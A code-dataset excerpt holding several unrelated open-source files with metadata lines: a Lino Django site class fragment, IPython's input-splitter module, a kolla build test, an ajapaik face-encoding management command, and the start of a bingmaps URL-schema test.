has a :meth:`show <lino.core.requests.BaseRequest.show>` method. """ if username is None: if not kw.has_key('user'): from lino.core.auth import AnonymousUser kw.update(user=AnonymousUser.instance()) else: kw.update(user=self.user_model.objects.get(username=username)) if not kw.has_key('renderer'): kw.update(renderer=self.ui.text_renderer) from lino.core import requests import lino.ui.urls # hack: trigger ui instantiation #~ if u.language: #~ from north.dbutils import set_language #~ set_language(u.language) return requests.BaseRequest(**kw) def get_media_urls(self): #~ print "20121110 get_media_urls" from django.conf.urls import patterns, url, include from lino.core.dbutils import is_devserver from django.conf import settings urlpatterns = [] logger.debug("Checking /media URLs ") prefix = settings.MEDIA_URL[1:] if not prefix.endswith('/'): raise Exception("MEDIA_URL %r doesn't end with a '/'!" % settings.MEDIA_URL) def setup_media_link(short_name,attr_name=None,source=None): target = join(settings.MEDIA_ROOT,short_name) if exists(target): #~ logger.info("20130409 path exists: %s",target) return if attr_name is not None: source = getattr(self,attr_name) if not source: raise Exception( "%s does not exist and SITE.%s is not set." 
% ( target,attr_name)) if not exists(source): raise Exception("SITE.%s (%s) does not exist" % (attr_name,source)) elif not exists(source): raise Exception("%s does not exist" % source) if is_devserver(): #~ logger.info("django.views.static serving /%s%s from %s",prefix,short_name,source) urlpatterns.extend(patterns('django.views.static', (r'^%s%s/(?P<path>.*)$' % (prefix,short_name), 'serve', { 'document_root': source, 'show_indexes': False }))) else: symlink = getattr(os,'symlink',None) if symlink is None: logger.info("Cannot create symlink %s -> %s.",target,source) #~ raise Exception("Cannot run a production server on an OS that doesn't have symlinks") else: logger.info("Create symlink %s -> %s.",target,source) symlink(source,target) if not self.extjs_base_url: setup_media_link('extjs','extjs_root') if self.use_bootstrap: if not self.bootstrap_base_url: setup_media_link('bootstrap','bootstrap_root') #~ else: #~ logger.info("20130409 self.bootstrap_base_url is %s",self.bootstrap_base_url) #~ else: #~ logger.info("20130409 self.use_bootstrap is False") if self.use_extensible: if not self.extensible_base_url: setup_media_link('extensible','extensible_root') if self.use_tinymce: if not self.tinymce_base_url: setup_media_link('tinymce','tinymce_root') if self.use_jasmine: setup_media_link('jasmine','jasmine_root') if self.use_eid_jslib: setup_media_link('eid-jslib','eid_jslib_root') #~ setup_media_link('lino',source=join(dirname(lino.__file__),'..','media')) try: setup_media_link('lino',source=resource_filename(Requirement.parse("lino"),"lino/media")) except DistributionNotFound as e: # if it is not installed using pip, link directly to the source tree setup_media_link('lino',source=join(dirname(lino.__file__),'media')) #~ logger.info("20130409 is_devserver() returns %s.",is_devserver()) if is_devserver(): urlpatterns += patterns('django.views.static', (r'^%s(?P<path>.*)$' % prefix, 'serve', { 'document_root': settings.MEDIA_ROOT, 'show_indexes': True }), ) return urlpatterns def get_pages_urls(self): from django.conf.urls import patterns, url, include from django import http from django.views.generic import View from lino import dd pages = dd.resolve_app('pages') class PagesIndex(View): def get(self, request,ref='index'): if not ref: ref = 'index' #~ print 20121220, ref obj = pages.lookup(ref,None) if obj is None: raise http.Http404("Unknown page %r" % ref) html = pages.render_node(request,obj) return http.HttpResponse(html) return patterns('', (r'^(?P<ref>\w*)$', PagesIndex.as_view()), ) def get_plain_urls(self): from django.conf.urls import patterns, url, include from lino.ui import views urlpatterns = [] rx = '^' urlpatterns = patterns('', (rx+r'$', views.PlainIndex.as_view()), (rx+r'(?P<app_label>\w+)/(?P<actor>\w+)$', views.PlainList.as_view()), (rx+r'(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>.+)$', views.PlainElement.as_view()), ) return urlpatterns def get_ext_urls(self): from django.conf.urls import patterns, url, include from lino.ui import views #~ print "20121110 get_urls" self.ui.ext_renderer.build_site_cache() rx = '^' urlpatterns = patterns('', (rx+'$', views.AdminIndex.as_view()), (rx+r'api/main_html$', views.MainHtml.as_view()), (rx+r'auth$', views.Authenticate.as_view()), (rx+r'grid_config/(?P<app_label>\w+)/(?P<actor>\w+)$', views.GridConfig.as_view()), (rx+r'api/(?P<app_label>\w+)/(?P<actor>\w+)$', views.ApiList.as_view()), (rx+r'api/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>.+)$', views.ApiElement.as_view()), (rx+r'restful/(?P<app_label>\w+)/(?P<actor>\w+)$', 
views.Restful.as_view()), (rx+r'restful/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>.+)$', views.Restful.as_view()), (rx+r'choices/(?P<app_label>\w+)/(?P<rptname>\w+)$', views.Choices.as_view()), (rx+r'choices/(?P<app_label>\w+)/(?P<rptname>\w+)/(?P<fldname>\w+)$', views.Choices.as_view()), (rx+r'apchoices/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<an>\w+)/(?P<field>\w+)$', views.ActionParamChoices.as_view()), # the thread_id can be a negative number: (rx+r'callbacks/(?P<thread_id>[\-0-9a-zA-Z]+)/(?P<button_id>\w+)$', views.Callbacks.as_view()), ) if self.use_eid_applet: urlpatterns += patterns('', (rx+r'eid-applet-service$', views.EidAppletService.as_view()), ) if self.use_jasmine: urlpatterns += patterns('', (rx+r'run-jasmine$', views.RunJasmine.as_view()), ) if self.user_model and self.use_tinymce: urlpatterns += patterns('', (rx+r'templates/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>\w+)/(?P<fldname>\w+)$', views.Templates.as_view()), (rx+r'templates/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>\w+)/(?P<fldname>\w+)/(?P<tplname>\w+)$', views.Templates.as_view()), ) return urlpatterns def get_patterns(self): self.startup() from djangosite.signals import database_ready database_ready.send(self) #~ self.logger.info("20130418 get_patterns()") from django.conf.urls import patterns, url, include urlpatterns = self.get_media_urls() if self.use_extjs and self.admin_prefix: urlpatterns += patterns('', ('^'+self.admin_prefix, include(self.get_ext_urls()))) if self.plain_prefix: urlpatterns += patterns('', ('^'+self.plain_prefix+"/", include(self.get_plain_urls())) ) if self.django_admin_prefix: # experimental from django.contrib import admin admin.autodiscover() urlpatterns += patterns('', ('^'+self.django_admin_prefix[1:]+"/", include(admin.site.urls)) ) if not self.plain_prefix: urlpatterns += self.get_plain_urls() if self.use_extjs and not self.admin_prefix: urlpatterns += self.get_ext_urls() #~ elif self.plain_prefix: #~ urlpatterns += self.get_pages_urls() #~ print 20131021, urlpatterns return urlpatterns def for_each_app(self,func,*args,**kw): """ Successor of :meth:`djangosite.Site.on_each_app`. This also loops over - apps that don't have a models module - inherited apps """ from django.utils.importlib import import_module for app_name in self.get_installed_apps(): app_mod = import_module(app_name) app = getattr(app_mod,'App',None) if app is not None and issubclass(app,ad.App) and app.extends: parent = import_module(app.extends) func(app.extends,parent,*args,**kw) func(app_name,app_mod,*args,**kw) def get_letter_date_text(self,today=None): """ Returns a string like "Eupen, den 26. August 2013". """ sc = self.site_config.site_company if today is None: today = datetime.date.today() from lino import dd if sc and sc.city: return _("%(place)s, %(date)s") % dict( place=unicode(sc.city.name), date=dd.fdl(today)) return dd.fdl(today) #~ def get_letter_margin_top_html(self,ar): #~ s = '<p class="Centered9pt">%s</p>' #~ s = s % self.site_config.site_company.get_address('<br/>') #~ return s #~ from lino.utils.config import find_config_file #~ logo_path = find_config_file('logo.jpg') #~ return '<img src="%s"/>' % logo_path #~ return '<img src="file://%s" />' % logo_path #~ def get_letter_margin_bottom_html(self,ar): #~ s = '<p class="Centered9pt">%s</p>' #~ s = s % self.site_config.site_company.get_address('<br/>') #~ return s #~ return '' def get_admin_main_items(self,ar): """ Yield a sequence of "items" to be rendered in :xfile:`admin_main.html`. 
""" return [] #~ def make_url_tester(self): #~ from lino.utils.test import URLTester #~ return URLTester()
gpl-3.0
1,687,644,786,316,544,300
33.001948
128
0.581512
false
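The Site attributes documented in the record above are designed to be overridden per project rather than edited in place. A minimal sketch of a project `settings.py` doing so follows; the base module path `lino.projects.std.settings` and the chosen attribute values are illustrative assumptions, not taken from the record itself.

# Hypothetical project settings.py overriding a few Site attributes shown above.
from lino.projects.std.settings import *  # assumed standard base settings module

class Site(Site):
    verbose_name = "My Lino site"   # used by welcome_html()
    is_demo_site = False            # production: no demo-users banner
    use_tinymce = False             # fall back to Ext.form.HtmlEditor
    demo_fixtures = ['std', 'demo']

SITE = Site(globals())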
sserrot/champion_relationships
venv/Lib/site-packages/IPython/core/inputsplitter.py
1
28155
"""DEPRECATED: Input handling and transformation machinery. This module was deprecated in IPython 7.0, in favour of inputtransformer2. The first class in this module, :class:`InputSplitter`, is designed to tell when input from a line-oriented frontend is complete and should be executed, and when the user should be prompted for another line of code instead. The name 'input splitter' is largely for historical reasons. A companion, :class:`IPythonInputSplitter`, provides the same functionality but with full support for the extended IPython syntax (magics, system calls, etc). The code to actually do these transformations is in :mod:`IPython.core.inputtransformer`. :class:`IPythonInputSplitter` feeds the raw code to the transformers in order and stores the results. For more details, see the class docstrings below. """ from warnings import warn warn('IPython.core.inputsplitter is deprecated since IPython 7 in favor of `IPython.core.inputtransformer2`', DeprecationWarning) # Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. import ast import codeop import io import re import sys import tokenize import warnings from IPython.core.inputtransformer import (leading_indent, classic_prompt, ipy_prompt, cellmagic, assemble_logical_lines, help_end, escaped_commands, assign_from_magic, assign_from_system, assemble_python_lines, ) # These are available in this module for backwards compatibility. from IPython.core.inputtransformer import (ESC_SHELL, ESC_SH_CAP, ESC_HELP, ESC_HELP2, ESC_MAGIC, ESC_MAGIC2, ESC_QUOTE, ESC_QUOTE2, ESC_PAREN, ESC_SEQUENCES) #----------------------------------------------------------------------------- # Utilities #----------------------------------------------------------------------------- # FIXME: These are general-purpose utilities that later can be moved to the # general ward. Kept here for now because we're being very strict about test # coverage with this code, and this lets us ensure that we keep 100% coverage # while developing. # compiled regexps for autoindent management dedent_re = re.compile('|'.join([ r'^\s+raise(\s.*)?$', # raise statement (+ space + other stuff, maybe) r'^\s+raise\([^\)]*\).*$', # wacky raise with immediate open paren r'^\s+return(\s.*)?$', # normal return (+ space + other stuff, maybe) r'^\s+return\([^\)]*\).*$', # wacky return with immediate open paren r'^\s+pass\s*$', # pass (optionally followed by trailing spaces) r'^\s+break\s*$', # break (optionally followed by trailing spaces) r'^\s+continue\s*$', # continue (optionally followed by trailing spaces) ])) ini_spaces_re = re.compile(r'^([ \t\r\f\v]+)') # regexp to match pure comment lines so we don't accidentally insert 'if 1:' # before pure comments comment_line_re = re.compile(r'^\s*\#') def num_ini_spaces(s): """Return the number of initial spaces in a string. Note that tabs are counted as a single space. For now, we do *not* support mixing of tabs and spaces in the user's input. Parameters ---------- s : string Returns ------- n : int """ ini_spaces = ini_spaces_re.match(s) if ini_spaces: return ini_spaces.end() else: return 0 # Fake token types for partial_tokenize: INCOMPLETE_STRING = tokenize.N_TOKENS IN_MULTILINE_STATEMENT = tokenize.N_TOKENS + 1 # The 2 classes below have the same API as TokenInfo, but don't try to look up # a token type name that they won't find. 
class IncompleteString: type = exact_type = INCOMPLETE_STRING def __init__(self, s, start, end, line): self.s = s self.start = start self.end = end self.line = line class InMultilineStatement: type = exact_type = IN_MULTILINE_STATEMENT def __init__(self, pos, line): self.s = '' self.start = self.end = pos self.line = line def partial_tokens(s): """Iterate over tokens from a possibly-incomplete string of code. This adds two special token types: INCOMPLETE_STRING and IN_MULTILINE_STATEMENT. These can only occur as the last token yielded, and represent the two main ways for code to be incomplete. """ readline = io.StringIO(s).readline token = tokenize.TokenInfo(tokenize.NEWLINE, '', (1, 0), (1, 0), '') try: for token in tokenize.generate_tokens(readline): yield token except tokenize.TokenError as e: # catch EOF error lines = s.splitlines(keepends=True) end = len(lines), len(lines[-1]) if 'multi-line string' in e.args[0]: l, c = start = token.end s = lines[l-1][c:] + ''.join(lines[l:]) yield IncompleteString(s, start, end, lines[-1]) elif 'multi-line statement' in e.args[0]: yield InMultilineStatement(end, lines[-1]) else: raise def find_next_indent(code): """Find the number of spaces for the next line of indentation""" tokens = list(partial_tokens(code)) if tokens[-1].type == tokenize.ENDMARKER: tokens.pop() if not tokens: return 0 while (tokens[-1].type in {tokenize.DEDENT, tokenize.NEWLINE, tokenize.COMMENT}): tokens.pop() if tokens[-1].type == INCOMPLETE_STRING: # Inside a multiline string return 0 # Find the indents used before prev_indents = [0] def _add_indent(n): if n != prev_indents[-1]: prev_indents.append(n) tokiter = iter(tokens) for tok in tokiter: if tok.type in {tokenize.INDENT, tokenize.DEDENT}: _add_indent(tok.end[1]) elif (tok.type == tokenize.NL): try: _add_indent(next(tokiter).start[1]) except StopIteration: break last_indent = prev_indents.pop() # If we've just opened a multiline statement (e.g. 'a = ['), indent more if tokens[-1].type == IN_MULTILINE_STATEMENT: if tokens[-2].exact_type in {tokenize.LPAR, tokenize.LSQB, tokenize.LBRACE}: return last_indent + 4 return last_indent if tokens[-1].exact_type == tokenize.COLON: # Line ends with colon - indent return last_indent + 4 if last_indent: # Examine the last line for dedent cues - statements like return or # raise which normally end a block of code. last_line_starts = 0 for i, tok in enumerate(tokens): if tok.type == tokenize.NEWLINE: last_line_starts = i + 1 last_line_tokens = tokens[last_line_starts:] names = [t.string for t in last_line_tokens if t.type == tokenize.NAME] if names and names[0] in {'raise', 'return', 'pass', 'break', 'continue'}: # Find the most recent indentation less than the current level for indent in reversed(prev_indents): if indent < last_indent: return indent return last_indent def last_blank(src): """Determine if the input source ends in a blank. A blank is either a newline or a line consisting of whitespace. Parameters ---------- src : string A single or multiline string. """ if not src: return False ll = src.splitlines()[-1] return (ll == '') or ll.isspace() last_two_blanks_re = re.compile(r'\n\s*\n\s*$', re.MULTILINE) last_two_blanks_re2 = re.compile(r'.+\n\s*\n\s+$', re.MULTILINE) def last_two_blanks(src): """Determine if the input source ends in two blanks. A blank is either a newline or a line consisting of whitespace. Parameters ---------- src : string A single or multiline string. 
""" if not src: return False # The logic here is tricky: I couldn't get a regexp to work and pass all # the tests, so I took a different approach: split the source by lines, # grab the last two and prepend '###\n' as a stand-in for whatever was in # the body before the last two lines. Then, with that structure, it's # possible to analyze with two regexps. Not the most elegant solution, but # it works. If anyone tries to change this logic, make sure to validate # the whole test suite first! new_src = '\n'.join(['###\n'] + src.splitlines()[-2:]) return (bool(last_two_blanks_re.match(new_src)) or bool(last_two_blanks_re2.match(new_src)) ) def remove_comments(src): """Remove all comments from input source. Note: comments are NOT recognized inside of strings! Parameters ---------- src : string A single or multiline input string. Returns ------- String with all Python comments removed. """ return re.sub('#.*', '', src) def get_input_encoding(): """Return the default standard input encoding. If sys.stdin has no encoding, 'ascii' is returned.""" # There are strange environments for which sys.stdin.encoding is None. We # ensure that a valid encoding is returned. encoding = getattr(sys.stdin, 'encoding', None) if encoding is None: encoding = 'ascii' return encoding #----------------------------------------------------------------------------- # Classes and functions for normal Python syntax handling #----------------------------------------------------------------------------- class InputSplitter(object): r"""An object that can accumulate lines of Python source before execution. This object is designed to be fed python source line-by-line, using :meth:`push`. It will return on each push whether the currently pushed code could be executed already. In addition, it provides a method called :meth:`push_accepts_more` that can be used to query whether more input can be pushed into a single interactive block. This is a simple example of how an interactive terminal-based client can use this tool:: isp = InputSplitter() while isp.push_accepts_more(): indent = ' '*isp.indent_spaces prompt = '>>> ' + indent line = indent + raw_input(prompt) isp.push(line) print 'Input source was:\n', isp.source_reset(), """ # A cache for storing the current indentation # The first value stores the most recently processed source input # The second value is the number of spaces for the current indentation # If self.source matches the first value, the second value is a valid # current indentation. Otherwise, the cache is invalid and the indentation # must be recalculated. _indent_spaces_cache = None, None # String, indicating the default input encoding. It is computed by default # at initialization time via get_input_encoding(), but it can be reset by a # client with specific knowledge of the encoding. encoding = '' # String where the current full source input is stored, properly encoded. # Reading this attribute is the normal way of querying the currently pushed # source code, that has been properly encoded. source = '' # Code object corresponding to the current source. It is automatically # synced to the source, so it can be queried at any time to obtain the code # object; it will be None if the source doesn't compile to valid Python. 
code = None # Private attributes # List with lines of input accumulated so far _buffer = None # Command compiler _compile = None # Boolean indicating whether the current block is complete _is_complete = None # Boolean indicating whether the current block has an unrecoverable syntax error _is_invalid = False def __init__(self): """Create a new InputSplitter instance. """ self._buffer = [] self._compile = codeop.CommandCompiler() self.encoding = get_input_encoding() def reset(self): """Reset the input buffer and associated state.""" self._buffer[:] = [] self.source = '' self.code = None self._is_complete = False self._is_invalid = False def source_reset(self): """Return the input source and perform a full reset. """ out = self.source self.reset() return out def check_complete(self, source): """Return whether a block of code is ready to execute, or should be continued This is a non-stateful API, and will reset the state of this InputSplitter. Parameters ---------- source : string Python input code, which can be multiline. Returns ------- status : str One of 'complete', 'incomplete', or 'invalid' if source is not a prefix of valid code. indent_spaces : int or None The number of spaces by which to indent the next line of code. If status is not 'incomplete', this is None. """ self.reset() try: self.push(source) except SyntaxError: # Transformers in IPythonInputSplitter can raise SyntaxError, # which push() will not catch. return 'invalid', None else: if self._is_invalid: return 'invalid', None elif self.push_accepts_more(): return 'incomplete', self.get_indent_spaces() else: return 'complete', None finally: self.reset() def push(self, lines:str) -> bool: """Push one or more lines of input. This stores the given lines and returns a status code indicating whether the code forms a complete Python block or not. Any exceptions generated in compilation are swallowed, but if an exception was produced, the method returns True. Parameters ---------- lines : string One or more lines of Python input. Returns ------- is_complete : boolean True if the current input source (the result of the current input plus prior inputs) forms a complete Python execution block. Note that this value is also stored as a private attribute (``_is_complete``), so it can be queried at any time. """ assert isinstance(lines, str) self._store(lines) source = self.source # Before calling _compile(), reset the code object to None so that if an # exception is raised in compilation, we don't mislead by having # inconsistent code/source attributes. self.code, self._is_complete = None, None self._is_invalid = False # Honor termination lines properly if source.endswith('\\\n'): return False try: with warnings.catch_warnings(): warnings.simplefilter('error', SyntaxWarning) self.code = self._compile(source, symbol="exec") # Invalid syntax can produce any of a number of different errors from # inside the compiler, so we have to catch them all. Syntax errors # immediately produce a 'ready' block, so the invalid Python can be # sent to the kernel for evaluation with possible ipython # special-syntax conversion. except (SyntaxError, OverflowError, ValueError, TypeError, MemoryError, SyntaxWarning): self._is_complete = True self._is_invalid = True else: # Compilation didn't produce any exceptions (though it may not have # given a complete code object) self._is_complete = self.code is not None return self._is_complete def push_accepts_more(self): """Return whether a block of interactive input can accept more input. 
This method is meant to be used by line-oriented frontends, who need to guess whether a block is complete or not based solely on prior and current input lines. The InputSplitter considers it has a complete interactive block and will not accept more input when either: * A SyntaxError is raised * The code is complete and consists of a single line or a single non-compound statement * The code is complete and has a blank line at the end If the current input produces a syntax error, this method immediately returns False but does *not* raise the syntax error exception, as typically clients will want to send invalid syntax to an execution backend which might convert the invalid syntax into valid Python via one of the dynamic IPython mechanisms. """ # With incomplete input, unconditionally accept more # A syntax error also sets _is_complete to True - see push() if not self._is_complete: #print("Not complete") # debug return True # The user can make any (complete) input execute by leaving a blank line last_line = self.source.splitlines()[-1] if (not last_line) or last_line.isspace(): #print("Blank line") # debug return False # If there's just a single line or AST node, and we're flush left, as is # the case after a simple statement such as 'a=1', we want to execute it # straight away. if self.get_indent_spaces() == 0: if len(self.source.splitlines()) <= 1: return False try: code_ast = ast.parse(u''.join(self._buffer)) except Exception: #print("Can't parse AST") # debug return False else: if len(code_ast.body) == 1 and \ not hasattr(code_ast.body[0], 'body'): #print("Simple statement") # debug return False # General fallback - accept more code return True def get_indent_spaces(self): sourcefor, n = self._indent_spaces_cache if sourcefor == self.source: return n # self.source always has a trailing newline n = find_next_indent(self.source[:-1]) self._indent_spaces_cache = (self.source, n) return n # Backwards compatibility. I think all code that used .indent_spaces was # inside IPython, but we can leave this here until IPython 7 in case any # other modules are using it. -TK, November 2017 indent_spaces = property(get_indent_spaces) def _store(self, lines, buffer=None, store='source'): """Store one or more lines of input. If input lines are not newline-terminated, a newline is automatically appended.""" if buffer is None: buffer = self._buffer if lines.endswith('\n'): buffer.append(lines) else: buffer.append(lines+'\n') setattr(self, store, self._set_source(buffer)) def _set_source(self, buffer): return u''.join(buffer) class IPythonInputSplitter(InputSplitter): """An input splitter that recognizes all of IPython's special syntax.""" # String with raw, untransformed input. source_raw = '' # Flag to track when a transformer has stored input that it hasn't given # back yet. transformer_accumulating = False # Flag to track when assemble_python_lines has stored input that it hasn't # given back yet. within_python_line = False # Private attributes # List with lines of raw input accumulated so far. 
_buffer_raw = None def __init__(self, line_input_checker=True, physical_line_transforms=None, logical_line_transforms=None, python_line_transforms=None): super(IPythonInputSplitter, self).__init__() self._buffer_raw = [] self._validate = True if physical_line_transforms is not None: self.physical_line_transforms = physical_line_transforms else: self.physical_line_transforms = [ leading_indent(), classic_prompt(), ipy_prompt(), cellmagic(end_on_blank_line=line_input_checker), ] self.assemble_logical_lines = assemble_logical_lines() if logical_line_transforms is not None: self.logical_line_transforms = logical_line_transforms else: self.logical_line_transforms = [ help_end(), escaped_commands(), assign_from_magic(), assign_from_system(), ] self.assemble_python_lines = assemble_python_lines() if python_line_transforms is not None: self.python_line_transforms = python_line_transforms else: # We don't use any of these at present self.python_line_transforms = [] @property def transforms(self): "Quick access to all transformers." return self.physical_line_transforms + \ [self.assemble_logical_lines] + self.logical_line_transforms + \ [self.assemble_python_lines] + self.python_line_transforms @property def transforms_in_use(self): """Transformers, excluding logical line transformers if we're in a Python line.""" t = self.physical_line_transforms[:] if not self.within_python_line: t += [self.assemble_logical_lines] + self.logical_line_transforms return t + [self.assemble_python_lines] + self.python_line_transforms def reset(self): """Reset the input buffer and associated state.""" super(IPythonInputSplitter, self).reset() self._buffer_raw[:] = [] self.source_raw = '' self.transformer_accumulating = False self.within_python_line = False for t in self.transforms: try: t.reset() except SyntaxError: # Nothing that calls reset() expects to handle transformer # errors pass def flush_transformers(self): def _flush(transform, outs): """yield transformed lines always strings, never None transform: the current transform outs: an iterable of previously transformed inputs. Each may be multiline, which will be passed one line at a time to transform. """ for out in outs: for line in out.splitlines(): # push one line at a time tmp = transform.push(line) if tmp is not None: yield tmp # reset the transform tmp = transform.reset() if tmp is not None: yield tmp out = [] for t in self.transforms_in_use: out = _flush(t, out) out = list(out) if out: self._store('\n'.join(out)) def raw_reset(self): """Return raw input only and perform a full reset. """ out = self.source_raw self.reset() return out def source_reset(self): try: self.flush_transformers() return self.source finally: self.reset() def push_accepts_more(self): if self.transformer_accumulating: return True else: return super(IPythonInputSplitter, self).push_accepts_more() def transform_cell(self, cell): """Process and translate a cell of input. """ self.reset() try: self.push(cell) self.flush_transformers() return self.source finally: self.reset() def push(self, lines:str) -> bool: """Push one or more lines of IPython input. This stores the given lines and returns a status code indicating whether the code forms a complete Python block or not, after processing all input lines for special IPython syntax. Any exceptions generated in compilation are swallowed, but if an exception was produced, the method returns True. Parameters ---------- lines : string One or more lines of Python input. 
Returns ------- is_complete : boolean True if the current input source (the result of the current input plus prior inputs) forms a complete Python execution block. Note that this value is also stored as a private attribute (_is_complete), so it can be queried at any time. """ assert isinstance(lines, str) # We must ensure all input is pure unicode # ''.splitlines() --> [], but we need to push the empty line to transformers lines_list = lines.splitlines() if not lines_list: lines_list = [''] # Store raw source before applying any transformations to it. Note # that this must be done *after* the reset() call that would otherwise # flush the buffer. self._store(lines, self._buffer_raw, 'source_raw') transformed_lines_list = [] for line in lines_list: transformed = self._transform_line(line) if transformed is not None: transformed_lines_list.append(transformed) if transformed_lines_list: transformed_lines = '\n'.join(transformed_lines_list) return super(IPythonInputSplitter, self).push(transformed_lines) else: # Got nothing back from transformers - they must be waiting for # more input. return False def _transform_line(self, line): """Push a line of input code through the various transformers. Returns any output from the transformers, or None if a transformer is accumulating lines. Sets self.transformer_accumulating as a side effect. """ def _accumulating(dbg): #print(dbg) self.transformer_accumulating = True return None for transformer in self.physical_line_transforms: line = transformer.push(line) if line is None: return _accumulating(transformer) if not self.within_python_line: line = self.assemble_logical_lines.push(line) if line is None: return _accumulating('acc logical line') for transformer in self.logical_line_transforms: line = transformer.push(line) if line is None: return _accumulating(transformer) line = self.assemble_python_lines.push(line) if line is None: self.within_python_line = True return _accumulating('acc python line') else: self.within_python_line = False for transformer in self.python_line_transforms: line = transformer.push(line) if line is None: return _accumulating(transformer) #print("transformers clear") #debug self.transformer_accumulating = False return line
mit
8,784,860,315,369,942,000
35.470207
109
0.58764
false
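The splitter classes in the record above are line-oriented: a frontend either feeds lines through push() and polls push_accepts_more(), or uses the stateless check_complete(). A short usage sketch, with status strings and indent values taken from the docstrings shown above:

from IPython.core.inputsplitter import IPythonInputSplitter  # deprecated API

isp = IPythonInputSplitter()
print(isp.check_complete("a = 1"))      # ('complete', None)
print(isp.check_complete("def f(x):"))  # ('incomplete', 4) - colon adds 4 spaces
print(isp.check_complete("a = '"))      # ('invalid', None) - unterminated string

# IPython special syntax (magics, system calls) is rewritten by the
# transformer pipeline before compilation:
print(isp.transform_cell("!ls"))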
HackToday/kolla
tests/test_build.py
1
3763
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from mock import patch
from os import path
from oslo_log import fixture as log_fixture
from oslo_log import log as logging
from oslotest import base
import sys

sys.path.append(path.abspath(path.join(path.dirname(__file__), '../tools')))
from tools import build

LOG = logging.getLogger(__name__)


class BuildTest(base.BaseTestCase):

    def setUp(self):
        super(BuildTest, self).setUp()
        self.useFixture(log_fixture.SetLogLevel([__name__],
                                                logging.logging.INFO))
        self.build_args = [__name__, "--debug"]

    def runTest(self):
        with patch.object(sys, 'argv', self.build_args):
            LOG.info("Running with args %s" % self.build_args)
            bad_results, good_results = build.main()

        # these are images that are known to not build properly
        excluded_images = ["gnocchi-api",
                           "gnocchi-statsd"]

        failures = 0
        for image, result in bad_results.iteritems():
            if image in excluded_images:
                # string values must be compared with ==, not identity
                if result == 'error':
                    continue
                failures += 1
                LOG.warning(">>> Expected image '%s' to fail, please update"
                            " the excluded_images in source file above if the"
                            " image build has been fixed." % image)
            else:
                if result != 'error':
                    continue
                failures += 1
                LOG.critical(">>> Expected image '%s' to succeed!" % image)

        self.assertEqual(failures, 0, "%d failure(s) occurred" % failures)


class BuildTestCentosBinaryDocker(BuildTest):
    def setUp(self):
        super(BuildTestCentosBinaryDocker, self).setUp()
        self.build_args.extend(["--base", "centos",
                                "--type", "binary"])


class BuildTestCentosSourceDocker(BuildTest):
    def setUp(self):
        super(BuildTestCentosSourceDocker, self).setUp()
        self.build_args.extend(["--base", "centos",
                                "--type", "source"])


class BuildTestUbuntuSourceDocker(BuildTest):
    def setUp(self):
        super(BuildTestUbuntuSourceDocker, self).setUp()
        self.build_args.extend(["--base", "ubuntu",
                                "--type", "source"])


class BuildTestCentosBinaryTemplate(BuildTest):
    def setUp(self):
        super(BuildTestCentosBinaryTemplate, self).setUp()
        self.build_args.extend(["--base", "centos",
                                "--type", "binary",
                                "--template"])


class BuildTestCentosSourceTemplate(BuildTest):
    def setUp(self):
        super(BuildTestCentosSourceTemplate, self).setUp()
        self.build_args.extend(["--base", "centos",
                                "--type", "source",
                                "--template"])


class BuildTestUbuntuSourceTemplate(BuildTest):
    def setUp(self):
        super(BuildTestUbuntuSourceTemplate, self).setUp()
        self.build_args.extend(["--base", "ubuntu",
                                "--type", "source",
                                "--template"])
apache-2.0
9,087,697,521,718,533,000
35.182692
78
0.575605
false
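Each concrete class in the test module above only varies the CLI arguments handed to kolla's build tool, so extending the build matrix is a one-liner subclass. A hypothetical variant for an Ubuntu binary build, following the same pattern:

class BuildTestUbuntuBinaryDocker(BuildTest):
    def setUp(self):
        super(BuildTestUbuntuBinaryDocker, self).setUp()
        self.build_args.extend(["--base", "ubuntu",
                                "--type", "binary"])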
Ajapaik/ajapaik-web
ajapaik/ajapaik_face_recognition/management/commands/run_face_encoding_on_unencoded_rectangles.py
1
1387
import multiprocessing
from json import loads, dumps

import face_recognition
from django.core.management.base import BaseCommand

from ajapaik.ajapaik_face_recognition.models import FaceRecognitionRectangle


def encode_single_rectangle(rectangle: FaceRecognitionRectangle) -> None:
    print('Processing rectangle %s' % rectangle.pk)
    try:
        image = face_recognition.load_image_file(rectangle.photo.image)
    except:  # noqa
        # Skip photos whose image file cannot be loaded.
        return
    try:
        encodings = face_recognition.face_encodings(image, known_face_locations=[loads(rectangle.coordinates)])
    except:  # noqa
        return
    if len(encodings) == 1:
        my_encoding = encodings[0]
        try:
            rectangle.face_encoding = dumps(my_encoding.tolist())
            rectangle.save()
        except:  # noqa
            return
    else:
        print('Found %s face encodings for rectangle %s, should find only 1' % (len(encodings), rectangle.id))


class Command(BaseCommand):
    help = 'Will run face encoding on all identified faces'
    args = 'subject_id'

    def handle(self, *args, **options):
        unknown_rectangles = FaceRecognitionRectangle.objects.filter(face_encoding__isnull=True).all()
        print('Found %s rectangles to run on' % unknown_rectangles.count())
        # Encodings are independent per rectangle, so fan out across cores.
        with multiprocessing.Pool() as pool:
            pool.map(encode_single_rectangle, unknown_rectangles)
gpl-3.0
-8,899,417,717,405,903,000
34.564103
111
0.681327
false
bharadwajyarlagadda/bingmaps
tests/test_location_by_address_url_schema.py
1
2911
import pytest
from bingmaps.apiservices import LocationByAddress
from bingmaps.urls import LocationByAddressSchema
from .fixtures import parametrize, BING_MAPS_KEY

http_protocol = 'http'
https_protocol = 'https'

DATA = [{'adminDistrict': 'WA'},
        {'key': 'vds'},
        {'adminDistrict': 'WA',
         'locality': 'Seattle',
         'key': 'abs'},
        {'adminDistrict': 'WA',
         'locality': 'Seattle',
         'key': BING_MAPS_KEY},
        {'adminDistrict': 'WA',
         'locality': 'Seattle',
         'key': BING_MAPS_KEY},
        {'adminDistrict': 'WA',
         'locality': 'Seattle',
         'o': 'xml',
         'key': BING_MAPS_KEY}
        ]

EXPECTED = [
    True,
    False,
